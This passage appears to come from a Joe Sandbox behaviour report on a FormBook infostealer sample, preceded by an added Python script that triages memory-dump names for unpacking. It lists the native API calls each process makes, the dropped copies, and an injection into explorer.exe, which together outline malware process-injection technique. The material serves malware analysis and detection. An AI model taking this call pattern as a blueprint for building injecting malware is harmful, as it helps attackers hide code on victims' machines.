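Every Yara hit in this list (and the same dump set under AV Detection and E-Banking Fraud) is reported against a memory dump whose name encodes where the matched code lived: all FormBook matches sit in regions with protection 0x40 and, inside filename1.exe, at low bases such as 0x30000 and 0x60000, which is unpacked code in allocated memory rather than a mapped image. The following Python is an added example, not part of the report, that decodes those names and flags the regions worth pulling for unpacking. It assumes the dump name layout PID.RUN.ID.BASE.PROTECTION.TYPE.sdmp with PROTECTION holding a Windows PAGE_* constant, which fits every name in this report (0x40 for the FormBook hits, 0x04 for the heap strings, 0x20 and 0x08 for mapped code); the TYPE field is parsed but not interpreted. The sample lines are taken from the list above; the heap dump name is the first one from the URL list in the Networking section.

```python
"""Decode Joe Sandbox memory-dump names and flag regions worth unpacking.

Added example; not part of the report.  Assumed name layout:
PID.RUN.ID.BASE.PROTECTION.TYPE.sdmp, PROTECTION being a Windows PAGE_*
constant.  TYPE is kept but not decoded.
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional

# Documented Windows PAGE_* memory-protection constants.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE_EXEC = {0x40, 0x80}

DUMP_RE = re.compile(
    r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp")
LINE_RE = re.compile(r"Source:\s*(\S+\.sdmp).*?Matched rule:\s*(.*?)\s*Author:")


class Dump(NamedTuple):
    pid: int
    run: int
    base: int
    protection: int
    region_type: int            # undecoded TYPE field
    rule: Optional[str]


def parse_dump(name: str, rule: Optional[str] = None) -> Dump:
    m = DUMP_RE.fullmatch(name.strip())
    if not m:
        raise ValueError("not a Joe Sandbox dump name: " + name)
    pid, run, _ident, base, prot, rtype = m.groups()
    return Dump(int(pid, 16), int(run, 16), int(base, 16), int(prot, 16), int(rtype, 16), rule)


def parse_report_line(line: str) -> Dump:
    """Parse one 'Source: <dump>, type: MEMORY ... Matched rule: <rule> Author: ...' line."""
    m = LINE_RE.search(line)
    if not m:
        raise ValueError("no dump/rule pair in line: " + line)
    return parse_dump(m.group(1), m.group(2))


def region_tags(d: Dump) -> List[str]:
    """Why this region matters: writable+executable, executable below the usual image bases, Yara hit."""
    tags = []
    if d.protection in WRITABLE_EXEC:
        tags.append("RWX")
    if d.protection in EXECUTABLE and d.base < 0x00400000:
        tags.append("exec-low-base")        # executable code below where images normally load
    if d.rule:
        tags.append("yara:" + d.rule)
    return tags


def triage(dumps: List[Dump]) -> Dict[int, List[str]]:
    """Per PID, one line per region worth a second look; plain RW heap/stack dumps are skipped."""
    out: Dict[int, List[str]] = defaultdict(list)
    for d in dumps:
        tags = region_tags(d)
        if tags:
            prot = PAGE_PROTECTION.get(d.protection, hex(d.protection))
            out[d.pid].append("run {} 0x{:08X} {} {}".format(d.run, d.base, prot, " ".join(tags)))
    return dict(out)


# Sample lines copied from the report's Yara list; the heap dump comes from the URL list.
SAMPLE_LINES = [
    "Source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group",
    "Source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group",
    "Source: 00000013.00000002.1409626473.003DF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth",
]
HEAP_DUMP = "00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp"
SAMPLE_DUMPS = [parse_report_line(l) for l in SAMPLE_LINES] + [parse_dump(HEAP_DUMP)]

if __name__ == "__main__":
    for pid, lines in sorted(triage(SAMPLE_DUMPS).items()):
        print("PID", pid)
        for line in lines:
            print("  ", line)
```

The PID 8 hit (explorer.exe, run 0) is the one to look at first: an RWX region holding FormBook code inside a process that was already running before the sample started is the injected copy, which is what the report's "Number of injected processes analysed: 1" refers to.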
Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Contains functionality to call native functions
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003EA414 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003EA8D2 NtResumeThread
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003E050D NtSetInformationThread,TerminateProcess
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003E0504 NtSetInformationThread
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003E3586 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003E4BDA NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003E3A51 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003EA8E0 NtResumeThread
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003E38CC NtWriteVirtualMemory
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003EB2C5 NtResumeThread
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003E3738 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003EA52A NtProtectVirtualMemory
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003E0511 NtSetInformationThread,TerminateProcess
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003E35BC NtWriteVirtualMemory
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003E3DA8 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_003E3BF4 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 1_2_0015A414 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 1_2_00150504 NtSetInformationThread
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 1_2_0015050D NtSetInformationThread,TerminateProcess
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 1_2_00154BDA NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 1_2_00150511 NtSetInformationThread,TerminateProcess
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 1_2_0015A52A NtProtectVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003EA414 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003EA8D2 NtResumeThread
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003E050D NtSetInformationThread,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003E0504 NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003E3586 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003E4BDA NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003E3A51 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003EA8E0 NtResumeThread
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003E38CC NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003EB2C5 NtResumeThread
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003E3738 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003EA52A NtProtectVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003E0511 NtSetInformationThread,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003E35BC NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003E3DA8 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 2_2_003E3BF4 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_0019A414 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_0019A8D2 NtResumeThread
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_0019050D NtSetInformationThread,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_00190504 NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_00193586 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_00194BDA NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_00193A51 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_001938CC NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_0019B2C5 NtResumeThread
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_0019A8E0 NtResumeThread
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_00190511 NtSetInformationThread,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_00193738 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_0019A52A NtProtectVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_001935BC NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_00193DA8 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 4_2_00193BF4 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 5_2_1EBA4EA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 5_2_1EBA5E80 NtReadFile,NtReadFile
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 5_2_1EBA5EC0 NtReadVirtualMemory,NtReadVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 5_2_1EBA4E30 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 5_2_1EBA5E40 NtQueueApcThread,NtQueueApcThread
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 5_2_1EBA5C10 NtQueryInformationProcess,NtQueryInformationProcess
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 5_2_1EBA5DC0 NtQuerySystemInformation,NtQuerySystemInformation
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 5_2_1EBA57F0 NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 5_2_1EBA6460 NtSuspendThread,NtSuspendThread
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 5_2_1EBA55A0 NtFreeVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA6580 NtUnmapViewOfSection,NtUnmapViewOfSection,5_2_1EBA6580
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA52B0 NtCreateSection,NtCreateSection,5_2_1EBA52B0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5390 NtDelayExecution,NtDelayExecution,5_2_1EBA5390
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA6070 NtResumeThread,NtResumeThread,5_2_1EBA6070
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5190 NtCreateFile,NtCreateFile,5_2_1EBA5190
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA6130 NtSetContextThread,NtSetContextThread,5_2_1EBA6130
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5E20 NtQueryVirtualMemory,5_2_1EBA5E20
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5E10 NtQueryValueKey,5_2_1EBA5E10
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5C40 NtQueryInformationToken,5_2_1EBA5C40
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5D50 NtQuerySection,5_2_1EBA5D50
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5AE0 NtProtectVirtualMemory,5_2_1EBA5AE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5BE0 NtQueryInformationFile,5_2_1EBA5BE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5860 NtOpenDirectoryObject,5_2_1EBA5860
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA59D0 NtOpenThread,5_2_1EBA59D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5960 NtOpenProcessToken,5_2_1EBA5960
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5950 NtOpenProcess,5_2_1EBA5950
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA6630 NtWriteFile,5_2_1EBA6630
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA6660 NtWriteVirtualMemory,5_2_1EBA6660
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA54B0 NtEnumerateKey,5_2_1EBA54B0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA54E0 NtEnumerateValueKey,5_2_1EBA54E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA65E0 NtWaitForSingleObject,5_2_1EBA65E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA55E0 NtGetContextThread,5_2_1EBA55E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5210 NtCreateMutant,5_2_1EBA5210
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA6200 NtSetInformationFile,5_2_1EBA6200
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5270 NtCreateProcessEx,5_2_1EBA5270
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA63D0 NtSetValueKey,5_2_1EBA63D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5090 NtClose,5_2_1EBA5090
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65EC0 NtReadVirtualMemory,NtReadVirtualMemory,7_2_1EF65EC0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65E80 NtReadFile,NtReadFile,7_2_1EF65E80
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65E40 NtQueueApcThread,NtQueueApcThread,7_2_1EF65E40
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65C10 NtQueryInformationProcess,NtQueryInformationProcess,7_2_1EF65C10
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65DC0 NtQuerySystemInformation,NtQuerySystemInformation,7_2_1EF65DC0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF657F0 NtMapViewOfSection,NtMapViewOfSection,7_2_1EF657F0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF655A0 NtFreeVirtualMemory,7_2_1EF655A0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF652B0 NtCreateSection,NtCreateSection,7_2_1EF652B0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65390 NtDelayExecution,NtDelayExecution,7_2_1EF65390
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65190 NtCreateFile,NtCreateFile,7_2_1EF65190
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF64EA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,7_2_1EF64EA0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF64E30 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,7_2_1EF64E30
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66460 NtSuspendThread,NtSuspendThread,7_2_1EF66460
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66580 NtUnmapViewOfSection,NtUnmapViewOfSection,7_2_1EF66580
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66070 NtResumeThread,NtResumeThread,7_2_1EF66070
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66130 NtSetContextThread,NtSetContextThread,7_2_1EF66130
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65E20 NtQueryVirtualMemory,7_2_1EF65E20
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65E10 NtQueryValueKey,7_2_1EF65E10
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65C40 NtQueryInformationToken,7_2_1EF65C40
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65D50 NtQuerySection,7_2_1EF65D50
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65AE0 NtProtectVirtualMemory,7_2_1EF65AE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65BE0 NtQueryInformationFile,7_2_1EF65BE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65860 NtOpenDirectoryObject,7_2_1EF65860
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF659D0 NtOpenThread,7_2_1EF659D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65960 NtOpenProcessToken,7_2_1EF65960
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65950 NtOpenProcess,7_2_1EF65950
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF654E0 NtEnumerateValueKey,7_2_1EF654E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF654B0 NtEnumerateKey,7_2_1EF654B0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF655E0 NtGetContextThread,7_2_1EF655E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65270 NtCreateProcessEx,7_2_1EF65270
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65210 NtCreateMutant,7_2_1EF65210
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65090 NtClose,7_2_1EF65090
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF651D0 NtCreateKey,7_2_1EF651D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66660 NtWriteVirtualMemory,7_2_1EF66660
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66630 NtWriteFile,7_2_1EF66630
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF665E0 NtWaitForSingleObject,7_2_1EF665E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66200 NtSetInformationFile,7_2_1EF66200
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF663D0 NtSetValueKey,7_2_1EF663D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_0015A414 NtProtectVirtualMemory,7_2_0015A414
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00150504 NtSetInformationThread,NtProtectVirtualMemory,7_2_00150504
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_0015A8D2 NtSetInformationThread,7_2_0015A8D2
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00154BDA NtAllocateVirtualMemory,7_2_00154BDA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00150511 NtSetInformationThread,7_2_00150511
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_0015050D NtSetInformationThread,7_2_0015050D
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_0015A52A NtProtectVirtualMemory,7_2_0015A52A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_0015A8E0 NtSetInformationThread,7_2_0015A8E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00150DE0 NtProtectVirtualMemory,7_2_00150DE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00150EF0 NtProtectVirtualMemory,7_2_00150EF0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_0015B2C5 NtSetInformationThread,7_2_0015B2C5
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_0024A414 NtProtectVirtualMemory,14_2_0024A414
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_0024A8D2 NtResumeThread,14_2_0024A8D2
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00240504 NtSetInformationThread,14_2_00240504
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_0024050D NtSetInformationThread,TerminateProcess,14_2_0024050D
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00243586 NtWriteVirtualMemory,14_2_00243586
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00244BDA NtAllocateVirtualMemory,14_2_00244BDA
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00243A51 NtWriteVirtualMemory,14_2_00243A51
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_0024A8E0 NtResumeThread,14_2_0024A8E0
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_0024B2C5 NtResumeThread,14_2_0024B2C5
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_002438CC NtWriteVirtualMemory,14_2_002438CC
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_0024A52A NtProtectVirtualMemory,14_2_0024A52A
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00243738 NtWriteVirtualMemory,14_2_00243738
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00240511 NtSetInformationThread,TerminateProcess,14_2_00240511
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00243DA8 NtWriteVirtualMemory,14_2_00243DA8
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_002435BC NtWriteVirtualMemory,14_2_002435BC
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00243BF4 NtWriteVirtualMemory,14_2_00243BF4
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_0015A414 NtProtectVirtualMemory,15_2_0015A414
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_00150504 NtSetInformationThread,15_2_00150504
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_0015050D NtSetInformationThread,TerminateProcess,15_2_0015050D
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_00154BDA NtAllocateVirtualMemory,15_2_00154BDA
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_00150511 NtSetInformationThread,TerminateProcess,15_2_00150511
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_0015A52A NtProtectVirtualMemory,15_2_0015A52A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75EC0 NtReadVirtualMemory,NtReadVirtualMemory,17_2_1ED75EC0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75E80 NtReadFile,NtReadFile,17_2_1ED75E80
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75E40 NtQueueApcThread,NtQueueApcThread,17_2_1ED75E40
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75C10 NtQueryInformationProcess,NtQueryInformationProcess,17_2_1ED75C10
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75DC0 NtQuerySystemInformation,NtQuerySystemInformation,17_2_1ED75DC0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED757F0 NtMapViewOfSection,NtMapViewOfSection,17_2_1ED757F0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED755A0 NtFreeVirtualMemory,17_2_1ED755A0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED752B0 NtCreateSection,NtCreateSection,17_2_1ED752B0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75390 NtDelayExecution,NtDelayExecution,17_2_1ED75390
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75190 NtCreateFile,NtCreateFile,17_2_1ED75190
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED74EA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,17_2_1ED74EA0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED74E30 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,17_2_1ED74E30
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76460 NtSuspendThread,NtSuspendThread,17_2_1ED76460
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76580 NtUnmapViewOfSection,NtUnmapViewOfSection,17_2_1ED76580
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76070 NtResumeThread,NtResumeThread,17_2_1ED76070
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76130 NtSetContextThread,NtSetContextThread,17_2_1ED76130
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75E10 NtQueryValueKey,17_2_1ED75E10
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75E20 NtQueryVirtualMemory,17_2_1ED75E20
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75C40 NtQueryInformationToken,17_2_1ED75C40
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75D50 NtQuerySection,17_2_1ED75D50
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75AE0 NtProtectVirtualMemory,17_2_1ED75AE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75BE0 NtQueryInformationFile,17_2_1ED75BE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75860 NtOpenDirectoryObject,17_2_1ED75860
